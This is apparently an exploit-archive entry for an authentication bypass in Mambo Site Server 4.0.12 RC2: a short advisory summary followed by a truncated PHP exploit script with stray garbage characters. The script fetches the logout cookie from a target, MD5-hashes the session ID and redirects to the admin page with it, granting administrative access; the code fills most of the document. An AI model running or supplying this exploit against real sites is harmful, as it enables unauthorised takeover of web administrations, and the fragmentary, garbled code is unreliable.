source: https://www.securityfocus.com/bid/6926/info Mambo Site Server may grant access without sufficiently validating cookie based authentication credentials. It has been reported that Mambo will accept a user cookie sent by the site as an administrative credential. To exploit this issue, the attacker must receive a cookie (such as the one issued during logout) and then use MD5 to encode their session ID in the cookie. The attacker may then access administrative pages using this cookie. This issue was reported in Mambo Site Server 4.0.12 RC2. Earlier versions may also be affected. $hostname"); } ��else { ��# Get the webpage which will give us the cookie ��fputs ($handle, "GET /" . trim($_POST['maindir'], "\x5c \x2f") . "/index.php?option=logout HTTP/1.0\nHost: {$_POST['hostname']}\n\n"); ��# Loop through the contents ��$buffer = ""; ��while (!feof ($handle)) { ��$buffer .= fgets ($handle, 2000); ��} ��# Create an array with each line as a seperate value ��$arr = explode ("\n", $buffer); ��# Loop through the array looking for the cookie ��foreach ($arr as $value) { ��# If we have found the cookie, proceed ��if (eregi ("Set-Cookie: sessioncookie=", $value)) { ��# Explode again, to sort out the sessionid ��$var = explode ("=", $value); ��# Now that we have all the information we need, we can redirect ��header ("Location: http://{$_POST['hostname']}/" . �� trim($_POST['admdir'], "\x5c \x2f") . "/index2.php?session_id=" . md5(trim($var[1]))); ��} ��} ��} ��} ?>

Hostname
Main directory
Admin directory

Query Builder